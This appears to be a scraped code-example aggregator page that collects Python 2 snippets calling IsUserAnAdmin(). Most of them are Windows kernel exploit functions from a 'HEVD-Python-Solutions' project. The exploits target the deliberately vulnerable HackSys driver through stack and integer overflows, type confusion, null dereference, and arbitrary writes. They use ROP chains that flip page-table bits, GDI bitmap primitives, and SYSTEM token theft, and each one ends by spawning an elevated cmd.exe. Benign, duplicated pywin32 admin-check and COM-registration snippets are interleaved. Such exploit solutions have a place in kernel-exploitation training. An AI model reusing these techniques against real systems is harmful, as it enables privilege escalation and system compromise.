def check_is_admin():
global _is_admin
if _is_admin is None:
from win32com.shell.shell import IsUserAnAdmin
import pythoncom
try:
_is_admin = IsUserAnAdmin()
except pythoncom.com_error, exc:
if exc.hresult != winerror.E_NOTIMPL:
raise
# not impl on this platform - must be old - assume is admin
_is_admin = True
return _is_admin
# If this exception is raised by a test, the test is reported as a 'skip'
python类IsUserAnAdmin()的实例源码
def trigger_integer_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
# [-- BUFFER PADDING --][-- EXTRA PADDING --][-- SHELLCODE PTR --][-- STRING TERMINATOR --]
print "[+] Constructing overflow string"
evil_input = "A" * 0x800 + "BBBB" * 10 + struct.pack("<L",heap_alloc_payload()) + struct.pack("<L",0xBAD0B0B0)
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 20
print "[+] Buf size: %d" % evil_size
einput = create_string_buffer(evil_input, evil_size)
print "[+] Triggering vuln .."
kernel32.DeviceIoControl(driver_handle, 0x222027, evil_input_ptr, 0xFFFFFFFF, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
HEVD_nullpointerdereference.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 22
收藏 0
点赞 0
评论 0
def trigger_nullpointer_dereference():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
NtAllocateVirtualMemory_shellcode_ptr()
magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
magicvalue_size = len(magicvalue)
magicvalue_ptr = id(magicvalue) + 20
dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x22202B, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
def trigger_stack_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
print "[+] Constructing malicious buffer"
evil_input = "\x41" * 2080 + struct.pack("<L",heap_alloc_payload())
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 20
print "[+] Buf size: %d" % evil_size
print "[+] Sending malicious buffer"
print "[+] Triggering vuln .."
kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn) , None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[!] Exploit did not work. Re-run it!"
def trigger_stack_overflow_GS():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
buffer_ptr, buffer_size = create_map_file()
print "[+] Sending malicious buffer"
print "[+] Triggering vuln .."
# Note buffer_size + 4 : +4 resides outside the mapped file to trigger an exception when memcpy the region
# before GS check, which BSODs box
kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4, None, 0,byref(dwReturn) , None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[!] Exploit did not work. Re-run it!"
HEVD_uninitializedheapvariable.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 24
收藏 0
点赞 0
评论 0
def trigger_uninitialized_heap_variable():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
magicvalue = struct.pack('<I', 0xBAD0B0B1)
magicvalue_ptr = id(magicvalue) + 20
magicvalue_size = len(magicvalue)
tainting_lookaside()
print "[+] Triggering vuln .."
kernel32.DeviceIoControl(driver_handle, 0x00222033, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
def check_is_admin():
global _is_admin
if _is_admin is None:
from win32com.shell.shell import IsUserAnAdmin
import pythoncom
try:
_is_admin = IsUserAnAdmin()
except pythoncom.com_error, exc:
if exc.hresult != winerror.E_NOTIMPL:
raise
# not impl on this platform - must be old - assume is admin
_is_admin = True
return _is_admin
# If this exception is raised by a test, the test is reported as a 'skip'
def check_is_admin():
global _is_admin
if _is_admin is None:
from win32com.shell.shell import IsUserAnAdmin
import pythoncom
try:
_is_admin = IsUserAnAdmin()
except pythoncom.com_error as exc:
if exc.hresult != winerror.E_NOTIMPL:
raise
# not impl on this platform - must be old - assume is admin
_is_admin = True
return _is_admin
# If this exception is raised by a test, the test is reported as a 'skip'
HEVD_arbitraryoverwrite.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 21
收藏 0
点赞 0
评论 0
def trigger_arbitrary_overwrite():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
# [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ]
write_what = heap_alloc_payload()
write_where = get_HDT_kernel_address() + 4
write_what_ptr = c_void_p(write_what)
evil_input = struct.pack("<L", addressof(write_what_ptr)) + struct.pack("<L", write_where)
evil_input_ptr = id(evil_input) + 20
evil_size = len(evil_input)
print "[+] Writing 0x%X at address 0x%X" % (write_what, write_where)
kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
print "[+] Calling NtQueryIntervalProfile to trigger vuln"
arb = c_ulong(0)
ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
HEVD_ununitializedstackvariable.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 27
收藏 0
点赞 0
评论 0
def trigger_uninitialized_stack_variable():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
magicvalue_ptr = id(magicvalue) + 20
magicvalue_size = len(magicvalue)
print "[+] Buf size: %d" % magicvalue_size
einput = create_string_buffer(magicvalue, magicvalue_size)
# stack spray
shellcode_ptr = heap_alloc_payload()
print "[+] Spraying stack with address: 0x%X" % shellcode_ptr
print "[+] Triggering vuln .."
ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024)
kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
def trigger_type_confusion():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
####
# typedef struct _USER_TYPE_CONFUSION_OBJECT {
# ULONG ObjectID;
# ULONG ObjectType;
# } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
####
print "[+] Constructing USER_TYPE_CONFUSION_OBJECT"
evil_input = "\x41" * 4 + struct.pack("<L",heap_alloc_payload())
evil_input_ptr = id(evil_input) + 20
evil_size = len(evil_input)
print "[+] Buf size: %d" % evil_size
print "[+] Sending confusion object"
print "[+] Triggering vuln .."
dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size, None, 0,byref(dwReturn) , None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[!] Exploit did not work. Re-run it!"
def trigger_stack_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
debug_print ("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
sys.exit()
base_addresses = get_base_address(["hal.dll", "win32kfull.sys"])
hal_base_address = base_addresses[0]
win32kfull_base_address = base_addresses[1]
shellcode_ptr = virtual_alloc_payload()
debug_print ("[+] Constructing malicious buffer w/ ROP chain")
evil_input = "\x41" * 0x808 # junk
evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122) # POP RDX; RETN
evil_input += struct.pack("<Q", 0x63000000) # 0x63000000 -> Supervisor Mode
evil_input += struct.pack("<Q", hal_base_address + 0xFDB2) # POP RAX; RETN
evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3) # PTE(shellcode ptr) - 3
evil_input += struct.pack("<Q", hal_base_address + 0x9943) # MOV [RAX], EDX; RETN
evil_input += struct.pack("<Q", hal_base_address + 0x19B20) # Invalidate Cache
evil_input += struct.pack("<Q", shellcode_ptr) # shellcode ptr
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 32
debug_print ("[+] Buf size: 0x%X" % evil_size)
debug_print ("[+] Sending malicious buffer")
debug_print ("[+] Triggering vuln ..")
kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
debug_print ("[*] Enjoy Elevated Privs !\n")
os.system('cmd.exe')
else:
debug_print ("[!] Exploit did not work. Re-run it!")
def RegisterPythonServer(filename, progids=None, verbose=0):
if progids:
if isinstance(progids, str):
progids = [progids]
# we know the CLSIDs we need, but we might not be an admin user
# and otherwise unable to register them. So as long as the progids
# exist and the DLL points at our version, assume it already is.
why_not = None
for progid in progids:
try:
clsid = pythoncom.MakeIID(progid)
except pythoncom.com_error:
# no progid - not registered.
break
# have a CLSID - open it.
try:
HKCR = winreg.HKEY_CLASSES_ROOT
hk = winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
dll = winreg.QueryValue(hk, "InprocServer32")
except WindowsError:
# no CLSID or InProcServer32 - not good!
break
ok_files = [os.path.basename(pythoncom.__file__),
'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
if os.path.basename(dll) not in ok_files:
why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
break
else:
#print "Skipping registration of '%s' - already registered" % filename
return
# needs registration - see if its likely!
try:
from win32com.shell.shell import IsUserAnAdmin
except ImportError:
print("Can't import win32com.shell - no idea if you are an admin or not?")
is_admin = False
else:
try:
is_admin = IsUserAnAdmin()
except pythoncom.com_error:
# old, less-secure OS - assume *is* admin.
is_admin = True
if not is_admin:
msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
if why_not:
msg += "\n(registration check failed as %s)" % why_not
# throw a normal "class not registered" exception - we don't report
# them the same way as "real" errors.
raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
# so theoretically we are able to register it.
cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
if verbose:
print("Registering engine", filename)
# print cmd
rc = os.system(cmd)
if rc:
print("Registration command was:")
print(cmd)
raise RuntimeError("Registration of engine '%s' failed" % filename)
def RegisterPythonServer(filename, progids=None, verbose=0):
if progids:
if isinstance(progids, basestring):
progids = [progids]
# we know the CLSIDs we need, but we might not be an admin user
# and otherwise unable to register them. So as long as the progids
# exist and the DLL points at our version, assume it already is.
why_not = None
for progid in progids:
try:
clsid = pythoncom.MakeIID(progid)
except pythoncom.com_error:
# no progid - not registered.
break
# have a CLSID - open it.
try:
HKCR = _winreg.HKEY_CLASSES_ROOT
hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
dll = _winreg.QueryValue(hk, "InprocServer32")
except WindowsError:
# no CLSID or InProcServer32 - not good!
break
ok_files = [os.path.basename(pythoncom.__file__),
'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
if os.path.basename(dll) not in ok_files:
why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
break
else:
#print "Skipping registration of '%s' - already registered" % filename
return
# needs registration - see if its likely!
try:
from win32com.shell.shell import IsUserAnAdmin
except ImportError:
print "Can't import win32com.shell - no idea if you are an admin or not?"
is_admin = False
else:
try:
is_admin = IsUserAnAdmin()
except pythoncom.com_error:
# old, less-secure OS - assume *is* admin.
is_admin = True
if not is_admin:
msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
if why_not:
msg += "\n(registration check failed as %s)" % why_not
# throw a normal "class not registered" exception - we don't report
# them the same way as "real" errors.
raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
# so theoretically we are able to register it.
cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
if verbose:
print "Registering engine", filename
# print cmd
rc = os.system(cmd)
if rc:
print "Registration command was:"
print cmd
raise RuntimeError("Registration of engine '%s' failed" % filename)
def RegisterPythonServer(filename, progids=None, verbose=0):
if progids:
if isinstance(progids, basestring):
progids = [progids]
# we know the CLSIDs we need, but we might not be an admin user
# and otherwise unable to register them. So as long as the progids
# exist and the DLL points at our version, assume it already is.
why_not = None
for progid in progids:
try:
clsid = pythoncom.MakeIID(progid)
except pythoncom.com_error:
# no progid - not registered.
break
# have a CLSID - open it.
try:
HKCR = _winreg.HKEY_CLASSES_ROOT
hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
dll = _winreg.QueryValue(hk, "InprocServer32")
except WindowsError:
# no CLSID or InProcServer32 - not good!
break
ok_files = [os.path.basename(pythoncom.__file__),
'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
if os.path.basename(dll) not in ok_files:
why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
break
else:
#print "Skipping registration of '%s' - already registered" % filename
return
# needs registration - see if its likely!
try:
from win32com.shell.shell import IsUserAnAdmin
except ImportError:
print "Can't import win32com.shell - no idea if you are an admin or not?"
is_admin = False
else:
try:
is_admin = IsUserAnAdmin()
except pythoncom.com_error:
# old, less-secure OS - assume *is* admin.
is_admin = True
if not is_admin:
msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
if why_not:
msg += "\n(registration check failed as %s)" % why_not
# throw a normal "class not registered" exception - we don't report
# them the same way as "real" errors.
raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
# so theoretically we are able to register it.
cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
if verbose:
print "Registering engine", filename
# print cmd
rc = os.system(cmd)
if rc:
print "Registration command was:"
print cmd
raise RuntimeError("Registration of engine '%s' failed" % filename)
HEVD_arbitraryoverwrite.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 23
收藏 0
点赞 0
评论 0
def trigger_arbitrary_overwrite():
""" Main Logic """
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
global hManager, hWorker
# Massaging heap for Manager Bitmap
debug_print ("[>] Setting up Manager Bitmap:")
debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
dup_address = alloc_free_accelerator_tables()
setup_manager_bitmap()
hManager_pvscan0_offset = dup_address + 0x50
debug_print ("\t[+] Manager Bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)
# Massaging heap for Worker Bitmap
debug_print ("\n[>] Setting up Worker Bitmap:")
debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
dup_address = alloc_free_accelerator_tables()
setup_worker_bitmap()
hWorker_pvscan0_offset = dup_address + 0x50
debug_print ("\t[+] Worker Bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)
# Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
write_where = hManager_pvscan0_offset
write_what_ptr = c_void_p(hWorker_pvscan0_offset)
evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
evil_input_ptr = id(evil_input) + 32
evil_size = len(evil_input)
debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
dwReturn = c_ulong()
kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
# Get SYSTEM EPROCESS
system_EPROCESS = get_PsISP_kernel_address()
debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)
# Get current EPROCESS
current_EPROCESS = get_current_eprocess(system_EPROCESS)
debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS)
system_token = c_ulonglong()
debug_print ("\r\n[+] Reading System TOKEN")
read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
debug_print ("[+] Writing System TOKEN")
write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
HEVD_arbitraryoverwrite.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 63
收藏 0
点赞 0
评论 0
def trigger_arbitrary_overwrite():
""" Main Logic """
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
global hManager, hWorker
# Calculate pointer to HMValidateHandle
findHMValidateHandle()
#Massaging heap for Manager Bitmap
debug_print ("[>] Setting up Manager Bitmap:")
debug_print ("\t[+] Allocating and Freeing Windows")
dup_address = alloc_free_windows()
setup_manager_bitmap()
hManager_pvscan0_offset = dup_address + 0x50
debug_print ("\t[+] Manager bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)
#Massaging heap for Worker Bitmap
debug_print ("[>] Setting up Worker Bitmap:")
debug_print ("\t[+] Allocating and Freeing Windows")
dup_address = alloc_free_windows()
setup_worker_bitmap()
hWorker_pvscan0_offset = dup_address + 0x50
debug_print ("\t[+] Worker bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)
# Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
write_where = hManager_pvscan0_offset
write_what_ptr = c_void_p(hWorker_pvscan0_offset)
evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
evil_input_ptr = id(evil_input) + 32
evil_size = len(evil_input)
debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
dwReturn = c_ulong()
kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
# Get SYSTEM EPROCESS
system_EPROCESS = get_PsISP_kernel_address()
debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)
# Get current EPROCESS
current_EPROCESS = get_current_eprocess(system_EPROCESS)
debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS)
system_token = c_ulonglong()
debug_print ("\r\n[+] Reading System TOKEN")
read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
debug_print ("[+] Writing System TOKEN")
write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
if shell.IsUserAnAdmin():
debug_print("[*] Enjoy Elevated Privs !\r\n")
os.system('cmd.exe')
else:
debug_print("[-] Exploit did not work. Re-run it!")
def RegisterPythonServer(filename, progids=None, verbose=0):
if progids:
if isinstance(progids, basestring):
progids = [progids]
# we know the CLSIDs we need, but we might not be an admin user
# and otherwise unable to register them. So as long as the progids
# exist and the DLL points at our version, assume it already is.
why_not = None
for progid in progids:
try:
clsid = pythoncom.MakeIID(progid)
except pythoncom.com_error:
# no progid - not registered.
break
# have a CLSID - open it.
try:
HKCR = _winreg.HKEY_CLASSES_ROOT
hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
dll = _winreg.QueryValue(hk, "InprocServer32")
except WindowsError:
# no CLSID or InProcServer32 - not good!
break
ok_files = [os.path.basename(pythoncom.__file__),
'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
if os.path.basename(dll) not in ok_files:
why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
break
else:
#print "Skipping registration of '%s' - already registered" % filename
return
# needs registration - see if its likely!
try:
from win32com.shell.shell import IsUserAnAdmin
except ImportError:
print "Can't import win32com.shell - no idea if you are an admin or not?"
is_admin = False
else:
try:
is_admin = IsUserAnAdmin()
except pythoncom.com_error:
# old, less-secure OS - assume *is* admin.
is_admin = True
if not is_admin:
msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
if why_not:
msg += "\n(registration check failed as %s)" % why_not
# throw a normal "class not registered" exception - we don't report
# them the same way as "real" errors.
raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
# so theoretically we are able to register it.
cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
if verbose:
print "Registering engine", filename
# print cmd
rc = os.system(cmd)
if rc:
print "Registration command was:"
print cmd
raise RuntimeError("Registration of engine '%s' failed" % filename)
